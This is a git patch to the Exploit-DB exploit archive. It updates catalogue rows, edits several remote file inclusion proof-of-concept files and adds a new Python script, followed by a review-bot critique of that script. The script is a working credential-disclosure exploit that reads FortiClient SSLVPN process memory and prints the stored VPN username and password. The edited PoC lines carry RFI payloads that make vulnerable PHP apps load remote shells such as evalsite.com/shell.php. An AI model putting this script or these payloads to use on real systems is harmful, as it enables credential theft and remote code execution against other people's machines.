From f96ddba143992211f5408339ade73687eeb7d8db Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 2 Sep 2016 05:08:35 +0000 Subject: [PATCH] DB: 2016-09-02 2 new exploits SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion phNNTP 1.3 - (article-raw.php) Remote File Inclusion Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion PHPMyRing 4.2.0 - (view_com.php) SQL Injection SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit phpwcms 1.1-RC4 - (spaw) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion phpPrintAnalyzer 1.2 - Remote File Inclusion Wheatblog 1.1 - (session.php) Remote File Inclusion phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload FortiClient SSLVPN 5.4 - Credentials Disclosure --- files.csv | 35 ++++++++------- platforms/php/{webapps => local}/2152.php | 0 platforms/php/webapps/2148.txt | 2 +- platforms/php/webapps/2154.txt | 2 +- platforms/php/webapps/2163.txt | 2 +- platforms/php/webapps/2165.txt | 2 +- platforms/php/webapps/2166.txt | 2 +- platforms/php/webapps/2168.txt | 2 +- platforms/php/webapps/2174.txt | 2 +- platforms/windows/local/40330.py | 55 +++++++++++++++++++++++ 10 files changed, 80 insertions(+), 24 deletions(-) rename 
platforms/php/{webapps => local}/2152.php (100%)
create mode 100755 platforms/windows/local/40330.py
diff --git a/files.csv b/files.csv
index 70a16ec1c..e21d31c63 100755
--- a/files.csv
+++ b/files.csv
@@ -1824,9 +1824,9 @@ id,file,description,date,author,platform,type,port
 2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0
 2127,platforms/php/webapps/2127.txt,"Modernbill 1.6 - (config.php) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0
 2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
-2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
-2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
-2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
+2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80
+2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80
+2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80
 2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - (installed_config_file) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0
 2133,platforms/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0
 2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta - (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0
@@ -1834,7 +1834,7 @@ id,file,description,date,author,platform,type,port
 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0
 2137,platforms/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0
 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0
-2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,0
+2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,80
 2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616
 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0
 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0
@@ -1843,40 +1843,40 @@ id,file,description,date,author,platform,type,port
 2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0
 2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0
 2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0
-2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0
+2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,80
 2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0
 2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
-2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,0
-2152,platforms/php/webapps/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC",2006-08-08,Heintz,php,webapps,0
+2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80
+2152,platforms/php/local/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC",2006-08-08,Heintz,php,local,0
 2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",php,webapps,0
-2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0
+2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80
 2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - (owimg.php3) Remote File Inclusion",2006-08-09,Drago84,php,webapps,0
 2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - (WAPPush) Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0
 2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0
 2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0
-2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,0
+2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,80
 2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow PoC",2006-08-10,"Luigi Auriemma",windows,dos,0
-2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0
+2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,80
 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445
-2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,0
+2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,80
 2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0
-2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
-2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
+2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80
+2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80
 2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0
-2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,0
+2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,80
 2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
 2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - (online.php) SQL Injection",2006-08-10,brOmstar,php,webapps,0
 2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
 2172,platforms/php/webapps/2172.txt,"Mambo Remository Component 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0
 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
-2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,0
+2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80
 2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion Exploit",2006-08-12,K-159,php,webapps,0
 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0
 2177,platforms/php/webapps/2177.txt,"Joomla Webring Component 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0
 2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0
 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0
 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0
-2181,platforms/php/webapps/2181.pl,"phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,0
+2181,platforms/php/webapps/2181.pl,"phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,80
 2182,platforms/php/webapps/2182.txt,"Mambo mmp Component 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0
 2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0
 2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0
@@ -36439,7 +36439,7 @@ id,file,description,date,author,platform,type,port
 40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80
 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
 40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0
-40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
+40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
 40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0
 40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
@@ -36459,3 +36459,4 @@ id,file,description,date,author,platform,type,port
 40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
+40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
diff --git a/platforms/php/webapps/2152.php b/platforms/php/local/2152.php
similarity index 100%
rename from platforms/php/webapps/2152.php
rename to platforms/php/local/2152.php
diff --git a/platforms/php/webapps/2148.txt b/platforms/php/webapps/2148.txt
index 140f3d80c..df8be8be1 100755
--- a/platforms/php/webapps/2148.txt
+++ b/platforms/php/webapps/2148.txt
@@ -17,7 +17,7 @@ Path: Declare file_newsportal ExP: -http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php? +http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php? Greatz: Str0ke
diff --git a/platforms/php/webapps/2154.txt b/platforms/php/webapps/2154.txt
index 113335527..36d0a3caf 100755
--- a/platforms/php/webapps/2154.txt
+++ b/platforms/php/webapps/2154.txt
@@ -29,7 +29,7 @@ include ($CFG["libdir"] . "stdlib.inc.php"); #################################################### Exploit: -http://www.site.com/[path]/common.inc.php?CFG[libdir]=http://evil_scripts? +http://server/[path]/common.inc.php?CFG[libdir]=http://evil_scripts? ####################################################
diff --git a/platforms/php/webapps/2163.txt b/platforms/php/webapps/2163.txt
index 4f22f3239..9c2a57ebe 100755
--- a/platforms/php/webapps/2163.txt
+++ b/platforms/php/webapps/2163.txt
@@ -23,7 +23,7 @@ include/inc_ext/spaw/dialogs/td.php Vendor Website: http://www.phpwcms.de/ PoC: -http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat? +http://server/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat? Google Dork:
diff --git a/platforms/php/webapps/2165.txt b/platforms/php/webapps/2165.txt
index 289eaed0e..97f21d601 100755
--- a/platforms/php/webapps/2165.txt
+++ b/platforms/php/webapps/2165.txt
@@ -15,7 +15,7 @@ Path : Declare $page ExpL: -http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php? +http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php? Greatz:str0ke
diff --git a/platforms/php/webapps/2166.txt b/platforms/php/webapps/2166.txt
index e86c9a6a2..ee888c196 100755
--- a/platforms/php/webapps/2166.txt
+++ b/platforms/php/webapps/2166.txt
@@ -11,7 +11,7 @@ Page Affect config.php ExP: -http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php' +http://server/dir_thatware/config.php?root_path=http://server/shell.php' Greatz: str0ke
diff --git a/platforms/php/webapps/2168.txt b/platforms/php/webapps/2168.txt
index 6eb846ab0..9eec5d659 100755
--- a/platforms/php/webapps/2168.txt
+++ b/platforms/php/webapps/2168.txt
@@ -9,7 +9,7 @@ #cont@ct: gaul@enet.com.cn #Exploit: -http://site.com/[path]/inc/header.inc.php?ficStyle=[evilcode] +http://server/[path]/inc/header.inc.php?ficStyle=[evilcode] Thx to : #batamhacker crew on dal.net h4ntu, havincaz, baylaw and all indonesian underground hacker
diff --git a/platforms/php/webapps/2174.txt b/platforms/php/webapps/2174.txt
index 84163f594..89d65f6b1 100755
--- a/platforms/php/webapps/2174.txt
+++ b/platforms/php/webapps/2174.txt
@@ -34,7 +34,7 @@ function Start_Session() *********************************************************************** Proof of Concept: -www.site.com/includes/session.php?wb_class_dir=SHELL +server/includes/session.php?wb_class_dir=SHELL Contact : Outlaw@aria-security.net
diff --git a/platforms/windows/local/40330.py b/platforms/windows/local/40330.py
new file mode 100755
index 000000000..020b08fd6
--- /dev/null
+++ b/platforms/windows/local/40330.py
@@ -0,0 +1,55 @@
+'''
+Title : Extracting clear text passwords from running processes(FortiClient)
+CVE-ID : none
+Product : FortiClient SSLVPN
+Service : FortiTray.exe
+Affected : <=5.4
+Impact : Critical
+Remote : No
+Website link : http://forticlient.com/
+Reported : 31/08/2016
+Authors : Viktor Minin https://1-33-7.com
+          Alexander Korznikov http://korznikov.com
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+In our research which involved this program we found that this process store the credentials that you supplied for connecting, in clear text in the process memory.
+In this situation a potential attacker who hacked your system can reveal your Username and Password steal and use them.
+This may assist him in gaining persistence access to your Organization LAN network.
+'''
+
+from winappdbg import Debug, Process, HexDump
+import sys
+
+filename = "FortiTray.exe" # Process name
+search_string = "fortissl" # pattern to get offset when the credentials stored
+
+# Searching function
+def memory_search( pid, strings ):
+    process = Process( pid )
+    mem_dump = []
+    ######
+    # You could also use process.search_regexp to use regular expressions,
+    # or process.search_text for Unicode strings,
+    # or process.search_hexa for raw bytes represented in hex.
+    ######
+    for address in process.search_bytes( strings ):
+        dump = process.read(address-10,800) #Dump 810 bytes from process memory
+        mem_dump.append(dump)
+    for i in mem_dump:
+        if "FortiClient SSLVPN offline" in i: #print all founds results by offsets to the screen.
+            print "\n"
+            print " [+] Address and port to connect: " + str(i[136:180])
+            print " [+] UserName: " + str(i[677:685])
+            print " [+] Password: " + str(i[705:715])
+            print "\n"
+
+debug = Debug()
+try:
+    # Lookup the currently running processes.
+    debug.system.scan_processes()
+    # Look for all processes that match the requested filename...
+    for ( process, name ) in debug.system.find_processes_by_filename( filename ):
+        pid = process.get_pid()
+        memory_search(pid,search_string)
+finally:
+    debug.stop()
+
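Review bot: The comment on the `process.read(address-10,800)` line in memory_search says 810 bytes, but the call reads 800 bytes starting 10 bytes before the match, so it should read `# read 800 bytes starting 10 bytes before the match`. The slices `i[136:180]`, `i[677:685]` and `i[705:715]` are unexplained constants tied to one build's in-memory layout; the header states "Affected : <=5.4" but does not record which build they were taken from, and a comment saying they are specific to the tested build would make that version claim checkable. The print statements make the script Python 2 only, which the header does not mention, and `HexDump`, `sys` and the loop variable `name` are imported or bound but never used.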